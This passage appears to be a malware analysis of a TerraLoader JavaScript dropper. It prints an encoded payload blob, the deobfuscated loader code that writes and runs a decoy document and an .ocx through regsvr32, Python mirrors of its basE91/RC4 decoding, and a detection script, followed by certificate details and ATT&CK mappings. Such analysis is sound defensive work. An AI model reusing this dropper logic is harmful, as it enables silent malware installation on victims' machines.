Y*tZPJ?CQZ)j_^%0%*IT21m1OC.uiZ;bhF&2"QwO6Q]cD+/(nm/h9S^YAAZnY:QcVLDGtXqcX3CUP@+%L+r3669qxo`3c%7sR)JKk%K/u_B4vgGc|cFwu4nw`So]`=[lw(Q,)@ltj<PxBe%I}Ap@XMBr[DeI%aN<G{n1G$8YJ3T9s#StdzsJgSeQW+=O+5N8}+$C~b/.!58*zMM.tRv~y|$0[lhrKG<[Ze|T4Q]v&M_2p(M?|cf:3u_/4SZm}a+wp4e7h?`sovY<Q{QoSXiyfHuY+*1k:xIXM<H$)dP_V8$vqQ;@DyZJiy{}1N;@FkOf?k:>b>G>@d`[n4Y#O`0X.QVk[IQwC}yCFfu/Zq&4InFBY3r"6qWt`["LJU8]Jm%T/@M5Q^]cVl+VH(0w>LrpZ{5$J?{VPHOm{K&)?U+WPqM%j;:(a!9lj^PZ6"~hs;d|.4g00ZwB4^4vcWjGpRa7qxJ~#5E*cHY7fWkL?o:G0vUIBxKO/N>U6shA>;;Yc@Z_T?<9{uPO"VOs,YO1He*Z/NNUy<,h%lc}qb!Qw<`PRu2^XmUM`uW,+KqJDO/<CcrR%./IE<_vQn^e~(t}pt+{!kr~{ua|u!h~qlG!OqOxKWCL.%GRmVL*V,b?uD"Mfp9d$qFawf|65vsH~S6{r}#Z+2i%Fax%)<9OBPU:=vL+x?TjJKdMb0yCF>#tp(:H}0C^bzlz^/&"B"Sl:o7h6KOsKgVPE]=_G`e~AyZn&=I6G"Hzn[8?H$*eBu2Ej$ByqU|U/=6N.HpUk{C62G@A2QJ9:L^69%Ah&6u;eRQ).~}QTzsjK@tMfxT@GQ`nc8a89N!J9/:ai[vr7T27Cj2?#)c%33Z4p/fi47{8DF7g,>,(%0!_=iZU3[.85V8Y=@X@&VW+bs(uR^I]Q:l|yI1p+g~y6<K*9{e#[FUIy}7t0SK!<@GExs7VDF4OG6cGA<WF=Zq].zTbJodmh5Ih7^C_*K|?Pop.3R(%B&5DD$C@k$ebCF#v{[Rx?XD_[+ELOMCk;tuTX0q)T&ltbCE=2I7Qq`mq72H;AJ"_skUmS/B5(.uvn[Bi0whDkniwsB:C.`tYlcgR!g1/XCD[+31;5Lw1Z"6,=9[siF_tCz8s$#a4gP0GuL%gw[|qk//KDSH3=wzeh5P|{9xJL<xzvOtgNi:q]DE:.tKw}5k<#~N#=7l=RMqW
[>jf<uB:`oX,zII9:&:P21TEYT.U&9[m/O`yN(Tk)vx#cJB<cV=m@&"]&/:]7@)pvR|!+Sg0fuZwj_BJ*1TS3O:TAF2_K~HKN1W^L;?k9@;<ZEp1)w/`?<i>9G$#X3*LQ4O~}!f@mprTJ.kx7o^VTuD/mO[hX2jzehc.f~"Bq}Qy1X}]:S$Cea(_oI%qW{s~O^X["y|6Lh<TM{(PC^QTl$b][l"I/TG<Y7)H]I+?u*%bnK~p,xK,$451V0/?o9yMk*CrotyFK5#Ya?OP5oiRA+2qZxL=D(oxvfZ;`5VYv_Fv}n+pX)qP(Nz<v}bMt0z_%$GzDb,`}tcqp|mJXl9QQ[z]y`v|vx$8IHz#"Os%3/,r<zbw.MrR7D_azOuU=`!R)!ny|Vi,UY5w**ms3]Kh}SQ#Cco^V~AV4F$$2Q(jYy_gWz9fJ7=|v2/g(}r.?=FTC[LASa_<M??_@/"GZf+8g9kqw8Y~&^;`gtNNd#MySjEWJ*:o?},x,R?D#;6ZY~NzEl6F^ZHR*4D@v9tbrwen(N[DAArTquI<~DDIzk%|)s%DCB5XC^/.![]fpywN1aUCp:L_Hq9Zy]fJntn[PwMol.&Ndu1q.h,4H{&*_@0NonFvt&YhsMZqx6^I=M~P(DmF#g}tAt}i/GL%q#BCP1Uv,,YaoxMIF@<Xqw*5|};yn]}|;s=?SXzgs9c<BY*R<t2yo]4!]9n)M+&|Qrcj25wt]:MEo*#?+VG9jC[Wc(Y<hkaku@jx)ty:%I=ULb2x/pFKZ/8b>QQO1.K|*q#q2~0k7hpISe6(aI`c:na_do]7egrvJE%Hj*.1)yVE%r_<y!eyms$PxQ.ZrM/.7lS~($SFaG4}}~Hk{Z}r6SVJeShXU@eJc.IJWx01?~me4fS~dzM|N&UX_.Zc@rFK}h`m!jB`OQ"uu^~]9MLbp@nl5<{,tp<?.LE*/G,s]l~**NxiLXpKH|DWFr~^bHX;1{n++bCUdS9Gy6N6i#@=:+>eF!u{mW|Yuq1ECwoE;n&&6/.0)b0Z1.Vn"zw<Jn[|[v*I+pC<^vquynEG{+R*wZF)pE{g8TgUx%<hC+lIr!BV,t?_c3ES"]]l6X|xy[pV[f$TdVa`>qZUz(yZB>y*r]}lV#bi*DVOm{>i<+jZySBl,_c.sz+{|^Ucy%4HDD1a:f}Iv/=:=~n|"H5Gn}<jeMD1cGrI1KI.?_+!+&hMqFrUj.C:bne:^#3^,[GE&Cvl),@{31t`/S83v35FH:WGxmF}pC#_%o1UAk~G2uEK?/}4~e6:[21@B4k<nplazNw{UH;1Jue7+J98qMruW6#f_.4YT9b$.ZS(6*lyU|uVPTx/;aOcHy{^xd,nDVc.Rv)E=i[u+:AXFHL?06Ch2>10V"C9$fpA7h{Op1qw@!,eY)fs3SS[$QmJbx4EsfXa!TrC4m&DVutfr}te8;.h=n%f*I=kngcP;CEXH]_ZipZL;mU67e}5ns4`k29/*72ZBm?{gK[(8flhw@.Ja:PV?b.4IygG#4!+7l.3uKv4VkP(Kb^9Njw;|F?3[D!MdW%{1kdqQ4g]MGBNxSI8?Y(aE"<+.bw#XQID?g,{`COeTY7I06#Mlc?L]~mo_I^,g^dtzz)(wJx9ef((oWakC5@qipAd&vw|:s35<T{aIW`LTThZ}@VzxE$po5n*e9?hwD2Q9+4Oj~[>()%UE!Fj0%Knl~fVYMK|<Idei56W9>IwcLhRm)M*gGrS[V>>s:"8#^ah4H!nYhHdJxax6lu^x)a[v]hRO;RLI5fDP,S6y7R6{ws$gR6Qx2_vET+H%vJkiQ&1<rjE09SRN?i&=Ok*)^|`m6E8}>BYx~h8c@ipDkrF9>JHEL~6DE6D,gFUR/Bx4*KQjZI[%Y3q(t:5~v^[D2:0l;Ot/,8W&]sV!^<zd}MSh~n2%C(4NkLD1RNj6P=C<#d@hsvD_16D0{o[pM88v=1^56bF5*9[CUxj[wO6gkrLM{qC)eBcJOgTH6~1WHQuZV]3vwAkRO0_
gFzguNtUBz":^(X6R=E9Z*e@4MR,}=E]<^5tY:81XZbcR0f*kEr#.}L8=c:7g`e}wB:V_5Kk6)WFOMb(0I8p@5nXw"[5X#
base = get_base();
var execute_payload = function(arg) {return (Function(arg))();};
execute_payload(decode_payload(blawp868, tab, offset_tab));
}
}
main();
```
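As an added example (not code from the loader or from this analysis), the decoding chain of the four functions above and the key-search loop of main(), re-implemented in Python: decode_byte() is the basE91 decoding over the character base built by get_base(), rc4_gen_xor() is RC4, and find_key() appends the ASCII digits of a counter to the fixed key prefix until RC4 of the marker array matches the reference sequence. The basE91 encoder, the 30-byte marker array and the plaintext are assumptions used only to build constructed sample data; the 18-value key prefix and the counter 199 are the values from the table above.

```python
# Added example, not code from the loader or from this analysis: Python mirrors of
# decode_byte() (basE91: same alphabet as get_base(), same 13/14-bit rule),
# rc4_gen_xor() (RC4) and the key-search do-while of main(). Sample data is constructed.

# The alphabet built by get_base(), in the same order (index = position).
BASE = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789"
        "!#$%&()*+,./:;<=>?@[]^_`{|}~\"")

def decode_byte(text):
    """Mirror of decode_byte(): basE91 text -> list of byte values (0..255)."""
    out = []
    acc = 0          # tmp_var: bit accumulator
    nbits = 0        # inc_offset: number of bits held in acc
    pending = -1     # ref_offset: first symbol of a pair, or -1
    for ch in text:
        idx = BASE.find(ch)
        if idx == -1:
            continue                       # symbols outside the base are skipped
        if pending < 0:
            pending = idx
            continue
        pending += idx * 91                # a pair encodes a value in 0..8280
        acc |= pending << nbits
        nbits += 13 if (pending & 8191) > 88 else 14
        while nbits > 7:
            out.append(acc & 255)
            acc >>= 8
            nbits -= 8
        pending = -1
    if pending > -1:                       # odd trailing symbol
        out.append((acc | pending << nbits) & 255)
    return out

def encode_byte(data):
    """basE91 encoder, inverse of decode_byte(); only used to build sample input."""
    out, acc, nbits = [], 0, 0
    for b in data:
        acc |= b << nbits
        nbits += 8
        if nbits > 13:
            v = acc & 8191
            if v > 88:
                acc >>= 13
                nbits -= 13
            else:
                v = acc & 16383
                acc >>= 14
                nbits -= 14
            out.append(BASE[v % 91] + BASE[v // 91])
    if nbits:
        out.append(BASE[acc % 91])
        if nbits > 7 or acc > 90:
            out.append(BASE[acc // 91])
    return "".join(out)

def rc4_gen_xor(data, key, key_len):
    """Mirror of rc4_gen_xor(): RC4 keyed with the first key_len values of key."""
    s = list(range(256))
    j = 0
    for i in range(256):                   # key scheduling
        j = (j + s[i] + key[i % key_len]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = []
    for b in data:                         # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) % 256])
    return out

def decode_payload(text, key, key_len):
    """Mirror of decode_payload(): basE91 decode, RC4, join into a string."""
    return "".join(chr(b) for b in rc4_gen_xor(decode_byte(text), key, key_len))

def find_key(prefix, reference, marker, limit=100000):
    """The do-while of main(): append the ASCII digits of 0, 1, 2, ... to the
    fixed key prefix until RC4(marker) == reference; returns (counter, key)."""
    for i in range(limit):
        key = prefix + [ord(c) for c in str(i)]
        if rc4_gen_xor(marker, key, len(key)) == reference:
            return i, key
    return None

if __name__ == "__main__":
    # Constructed demo: the 18-value prefix and counter 199 from the table above,
    # with a marker array and a plaintext chosen here, not taken from the sample.
    prefix = [98, 72, 102, 109, 106, 112, 83, 117, 101, 117,
              65, 79, 115, 68, 88, 116, 104, 108]
    key = prefix + [49, 57, 57]
    marker = list(range(30))
    print("recovered:", find_key(prefix, rc4_gen_xor(marker, key, 21), marker))
    blob = encode_byte(rc4_gen_xor([ord(c) for c in "WScript.Shell"], key, 21))
    print(blob, "->", decode_payload(blob, key, 21))
```

Because RC4 is symmetric, the same rc4_gen_xor() both builds the constructed sample and decrypts it; feeding the real blawp strings to decode_payload() with the key array from the table is the same call.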
<h6>List of the main objects used for the second layer:</h6>
|Variable|Role|
| :-------------: |:-------------:|
|blawp868|Second layer payload|
|blawp7|Decoy document|
|blawp718|PE file (ocx file)|
<h3>Second layer<a name="second"></a></h3>
<h6>The second layer uses the same decryption functions as the first layer, and the global variables of the first layer, like this:</h6>
```javascript
var actxobj = get_actxobj(decode_payload("3^WFo*N06.xVSb8.", blawp15, 21));
tmp_actxobj = actxobj.environment(decode_payload("?@1YW3E[A", blawp15, 21));
blawp682 = tmp_actxobj(decode_payload("c{+tm06*B", blawp15, 21)) + "\\" + decode_payload("rVVF=+;Msl7", blawp15, 21) + "\\";
```
<h6>In addition to the functions of layer 1, it adds five functions. These give the ability to write the decrypted data to a file, get a random number (used for the file names), get a character from its code, convert the decrypted bytes to a code page 437 string for the text stream, and create an ActiveX object.</h6>
```javascript
function get_char(arg){return String.fromCharCode(arg);}
function get_payload(arg)
{
var tab = [];
var tmp_tab = [];
var result = "";
var tmp;
var value;
var index = 0;
tab[0x80] = 0x00C7;
tab[0x81] = 0x00FC;
tab[0x82] = 0x00E9;
tab[0x83] = 0x00E2;
tab[0x84] = 0x00E4;
tab[0x85] = 0x00E0;
tab[0x86] = 0x00E5;
tab[0x87] = 0x00E7;
tab[0x88] = 0x00EA;
tab[0x89] = 0x00EB;
tab[0x8A] = 0x00E8;
tab[0x8B] = 0x00EF;
tab[0x8C] = 0x00EE;
tab[0x8D] = 0x00EC;
tab[0x8E] = 0x00C4;
tab[0x8F] = 0x00C5;
tab[0x90] = 0x00C9;
tab[0x91] = 0x00E6;
tab[0x92] = 0x00C6;
tab[0x93] = 0x00F4;
tab[0x94] = 0x00F6;
tab[0x95] = 0x00F2;
tab[0x96] = 0x00FB;
tab[0x97] = 0x00F9;
tab[0x98] = 0x00FF;
tab[0x99] = 0x00D6;
tab[0x9A] = 0x00DC;
tab[0x9B] = 0x00A2;
tab[0x9C] = 0x00A3;
tab[0x9D] = 0x00A5;
tab[0x9E] = 0x20A7;
tab[0x9F] = 0x0192;
tab[0xA0] = 0x00E1;
tab[0xA1] = 0x00ED;
tab[0xA2] = 0x00F3;
tab[0xA3] = 0x00FA;
tab[0xA4] = 0x00F1;
tab[0xA5] = 0x00D1;
tab[0xA6] = 0x00AA;
tab[0xA7] = 0x00BA;
tab[0xA8] = 0x00BF;
tab[0xA9] = 0x2310;
tab[0xAA] = 0x00AC;
tab[0xAB] = 0x00BD;
tab[0xAC] = 0x00BC;
tab[0xAD] = 0x00A1;
tab[0xAE] = 0x00AB;
tab[0xAF] = 0x00BB;
tab[0xB0] = 0x2591;
tab[0xB1] = 0x2592;
tab[0xB2] = 0x2593;
tab[0xB3] = 0x2502;
tab[0xB4] = 0x2524;
tab[0xB5] = 0x2561;
tab[0xB6] = 0x2562;
tab[0xB7] = 0x2556;
tab[0xB8] = 0x2555;
tab[0xB9] = 0x2563;
tab[0xBA] = 0x2551;
tab[0xBB] = 0x2557;
tab[0xBC] = 0x255D;
tab[0xBD] = 0x255C;
tab[0xBE] = 0x255B;
tab[0xBF] = 0x2510;
tab[0xC0] = 0x2514;
tab[0xC1] = 0x2534;
tab[0xC2] = 0x252C;
tab[0xC3] = 0x251C;
tab[0xC4] = 0x2500;
tab[0xC5] = 0x253C;
tab[0xC6] = 0x255E;
tab[0xC7] = 0x255F;
tab[0xC8] = 0x255A;
tab[0xC9] = 0x2554;
tab[0xCA] = 0x2569;
tab[0xCB] = 0x2566;
tab[0xCC] = 0x2560;
tab[0xCD] = 0x2550;
tab[0xCE] = 0x256C;
tab[0xCF] = 0x2567;
tab[0xD0] = 0x2568;
tab[0xD1] = 0x2564;
tab[0xD2] = 0x2565;
tab[0xD3] = 0x2559;
tab[0xD4] = 0x2558;
tab[0xD5] = 0x2552;
tab[0xD6] = 0x2553;
tab[0xD7] = 0x256B;
tab[0xD8] = 0x256A;
tab[0xD9] = 0x2518;
tab[0xDA] = 0x250C;
tab[0xDB] = 0x2588;
tab[0xDC] = 0x2584;
tab[0xDD] = 0x258C;
tab[0xDE] = 0x2590;
tab[0xDF] = 0x2580;
tab[0xE0] = 0x03B1;
tab[0xE1] = 0x00DF;
tab[0xE2] = 0x0393;
tab[0xE3] = 0x03C0;
tab[0xE4] = 0x03A3;
tab[0xE5] = 0x03C3;
tab[0xE6] = 0x00B5;
tab[0xE7] = 0x03C4;
tab[0xE8] = 0x03A6;
tab[0xE9] = 0x0398;
tab[0xEA] = 0x03A9;
tab[0xEB] = 0x03B4;
tab[0xEC] = 0x221E;
tab[0xED] = 0x03C6;
tab[0xEE] = 0x03B5;
tab[0xEF] = 0x2229;
tab[0xF0] = 0x2261;
tab[0xF1] = 0x00B1;
tab[0xF2] = 0x2265;
tab[0xF3] = 0x2264;
tab[0xF4] = 0x2320;
tab[0xF5] = 0x2321;
tab[0xF6] = 0x00F7;
tab[0xF7] = 0x2248;
tab[0xF8] = 0x00B0;
tab[0xF9] = 0x2219;
tab[0xFA] = 0x00B7;
tab[0xFB] = 0x221A;
tab[0xFC] = 0x207F;
tab[0xFD] = 0x00B2;
tab[0xFE] = 0x25A0;
tab[0xFF] = 0x00A0;
do {
tmp = arg[index];
if (tmp < 128) {value = tmp;}
else {value = tab[tmp];}
tmp_tab.push(get_char(value));
index += 1;
}
while (index < get_length(arg));
result = tmp_tab.join("");
return result;
}
function get_actxobj(arg) {return new ActiveXObject(arg);}
function get_random_num() {return Math.floor(Math.random() * 65536);}
function write_obj(off_data, path, offset1, offset2, condition_write)
{
try
{
var data = decode_octet(off_data);
var payload = rc4_gen_xor(data, offset1, offset2);
data = 0;
if (condition_write === 1 && payload[0] !== 0x4D && payload[1] !== 0x5a){return 0;}
var actxobj = get_actxobj("ADODB.Stream");
actxobj.open();
actxobj.position = 0;
actxobj.type = 2;
actxobj.charset = 437;
actxobj.writeText(get_payload(payload));
payload = 0;
actxobj.saveToFile(path);
actxobj.close();
}
catch (e) {return 0;}
return 1;
}
```
<h6>First, it checks that the various objects needed for the rest of the operations are present in memory. This serves as an anti-sandbox check and prevents execution from a dump of the second layer alone, outside the first layer.</h6>
```javascript
try { if (gen_tab_lay1 && 21 && data_off_doc && get_length){main();} } //anti-sandbox
catch (e){var blawp341 = 0;} // kill switch
```
<h6>Second, it performs another anti-sandbox operation, relying on sandboxes that do not properly handle exceptions.</h6>
```javascript
function main()
{
try
{
blawp472.blawp555; // kill switch: these values are never created -> exception -> payloads
return true;
}
catch(e) {exec_pay();}
}
```
<h6>Finally, it drops the document and the DLL and executes them.</h6>
```javascript
function exec_pay()
{
var tmp_actxobj;
var path_appdata = "";
var path_exec_exe = "";
try
{
var actxobj = get_actxobj("WScript.Shell");
tmp_actxobj = actxobj.environment("PROCESS");
path_appdata = tmp_actxobj("APPDATA") + "\\Microsoft\\";
tmp_actxobj = 0;
}
catch (e) {path_appdata = "";}
var path_doc;
path_doc = path_appdata + get_random_num() + ".doc";
if (write_obj(data_off_doc, path_doc, gen_tab_lay1, 21, 0) === 1)
{
var path_full_doc = "winword.exe " + '"' + path_doc + '"';
var return_value = 0;
try
{
actxobj.Run(path_full_doc, 1, 0);
return_value = 1;
}
catch (e) {return_value = 0;}
}
data_off_doc = 0;
path_doc = 0;
path_full_doc = 0;
path_appdata = path_appdata + get_random_num() + ".ocx";
if (write_obj(data_off_exe, path_appdata, gen_tab_lay1, 21, 1) === 1)
{
data_off_exe = "";
var return_value = 0;
path_exec_exe = "regsvr32 /s /i " + '"' + path_appdata + '"';
try
{
actxobj.Run(path_exec_exe, 1, 0);
return_value = 1;
}
catch (e) {return_value = 0;}
}
}
```
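As an added detection example (not code from the original sample or from this analysis), the following Python flags process-creation events that match the drop-and-execute pattern of exec_pay(): numeric .doc/.ocx names under %APPDATA%\Microsoft, launched through winword.exe or regsvr32 /s /i, typically with a script host as parent. The events are constructed, not real telemetry.

```python
import re

# Constructed process-creation events (not real telemetry): roughly the fields
# a Sysmon Event ID 1 record carries. Usernames, paths and numbers are made up.
EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s /i "C:\Users\bob\AppData\Roaming\Microsoft\40731.ocx"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'winword.exe "C:\Users\bob\AppData\Roaming\Microsoft\12558.doc"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\plugin.dll"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'winword.exe "C:\Users\bob\Documents\report.doc"'},
]
# Path written by exec_pay(): %APPDATA%\Microsoft\<n>.doc|.ocx, n = Math.floor(Math.random()*65536)
DROP_PATH = re.compile(
    r'[A-Za-z]:\\Users\\[^\\"]+\\AppData\\Roaming\\Microsoft\\(\d{1,5})\.(doc|ocx)\b',
    re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def classify(event):
    """Return (dropped_path, reason) if the event matches the loader's pattern, else None."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    m = DROP_PATH.search(event["cmdline"])
    if m is None or int(m.group(1)) > 65535:
        return None
    ext, args = m.group(2).lower(), event["cmdline"].lower().split()
    if image == "regsvr32.exe" and ext == "ocx" and "/s" in args and "/i" in args:
        reason = "regsvr32 /s /i on a numeric .ocx under %APPDATA%\\Microsoft"
    elif image == "winword.exe" and ext == "doc":
        reason = "winword.exe opened a numeric .doc under %APPDATA%\\Microsoft"
    else:
        return None
    if parent in SCRIPT_HOSTS:  # the loader itself runs under a script host
        reason += "; parent is a Windows Script Host"
    return m.group(0), reason

def scan(events):
    hits = []  # list of (event index, dropped path, reason)
    for i, ev in enumerate(events):
        result = classify(ev)
        if result is not None:
            hits.append((i,) + result)
    return hits
```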
<h3>Additional Information<a name="infos"></a></h3>
<h6>The certificate used to sign the JS script contains some interesting information. The RSA public key was randomly generated rather than imported directly. The certificate was issued on March 15, 2019, and uses "thawte, Inc." as the organization name.</h6>
```text
ProviderType : PROV_RSA_AES
KeyNumber : 1
CryptoKeySecurity :
RandomlyGenerated : True
KeyExchangeAlgorithm : RSA-PKCS1-KeyEx
KeySize : 2048
PersistKeyInCsp : False
Algorithm : RSA
Key : 48 130 1 10 2 130 1 1 0 191 20 81 76 181 16 114 2 236 246 10 207 164 118 97 68 174 146 162 65 42 15 128 85 156 37 60 45 186 3 52 169 103 113 194 240 124 8 38 16 69 59 105 225 140 199 198 24 217 73 230 158 41 135 7
114 239 187 204 83 134 244 169 114 51 183 179 5 76 24 212 163 204 239 148 157 38 178 194 227 123 170 34 158 91 127 171 177 87 153 88 77 118 222 204 39 84 98 159 183 59 83 108 30 21 154 234 30 188 94 177 54 91 217
128 24 126 96 90 61 4 49 231 169 227 199 179 136 234 22 115 104 94 130 4 227 247 233 76 211 36 172 247 25 147 194 178 37 201 7 24 89 212 165 241 220 85 36 113 35 138 86 127 233 106 189 129 158 216 50 166 197 196
214 10 105 102 199 131 109 75 178 168 232 190 49 210 1 241 27 130 179 51 140 25 151 126 50 35 184 37 29 163 240 90 245 184 12 118 201 161 193 236 2 42 92 87 222 205 207 200 153 9 169 111 227 141 201 195 198 148
207 199 212 109 164 68 158 131 47 9 169 94 96 192 95 89 59 144 247 203 252 40 68 149 159 2 3 1 0 1
```
```text
Creation_Date Expiration_Date Signature_Algorithm
------------- --------------- -------------------
15/03/2019 01:00:00 15/03/2020 00:59:59 sha256RSA
```
```text
IssuerName Hash Version SerialNumber
---------- ---- ------- ------------
CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US 259e2142575482b958a102aa64129fe7d3f9035a 3 3309fadb8da0ed2efa1e1d691e36022d
```
<h6>In addition, it is interesting to note that the loader's code is not stylistically uniform: some parts appear to have been developed by different people, either picked up from forums or commissioned from another developer. For example, the code uses <code>i = i + 1</code> everywhere to increment an index or a counter, whereas the RC4 decryption routine uses the condensed form <code>i += 1</code> for all its increments.</h6>
<h6>This campaign appears to target the pension fund of the First Atlantic Health Care organization; a copy of the decoy document can be viewed <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/02-01-20/Document.txt">here</a>.</h6>

<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
<h6>The process graph summarizes the cyber kill chain used by the attacker:</h6>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Additional%20Analysis/Terraloader/02-01-20/pictures/cyber.png">
</p>
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
<h6> List of all the Indicators Of Compromise (IOC)</h6>
|Indicator|Description|
| ------------- |:-------------:|
|||
<h6> The IOC can be exported in <a href="">JSON</a></h6>
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|Enterprise tactics|Technics used|Ref URL|
| :---------------: |:-------------| :------------- |
|Execution|Regsvr32<br>Execution through Module Load|https://attack.mitre.org/techniques/T1117/<br>https://attack.mitre.org/techniques/T1129/|
|Defense Evasion|Regsvr32<br>Install Root Certificate|https://attack.mitre.org/techniques/T1117/<br>https://attack.mitre.org/techniques/T1130/|
|Discovery|Query Registry|https://attack.mitre.org/techniques/T1012/|

<h6> This can be exported as JSON format: <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/02-01-20/Json/MitreAttack.json">Export in JSON</a></h6>
<h2>Links <a name="Links"></a></h2>
<h6> Original tweet: </h6><a name="tweet"></a>
* [https://twitter.com/Ledtech3/status/1211760115008888832](https://twitter.com/Ledtech3/status/1211760115008888832)
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
* [Job Description.js](https://app.any.run/tasks/1b909852-114b-4a4c-8b90-f36016501d6d)
<h6> Resources: </h6><a name="Ressources"></a>
* [Analysis of TerraLoader sample from Vitali Kremez](https://twitter.com/VK_Intel/status/1211758023376592896)
* [RC4 Encryption Algorithm](https://www.geeksforgeeks.org/rc4-encryption-algorithm/)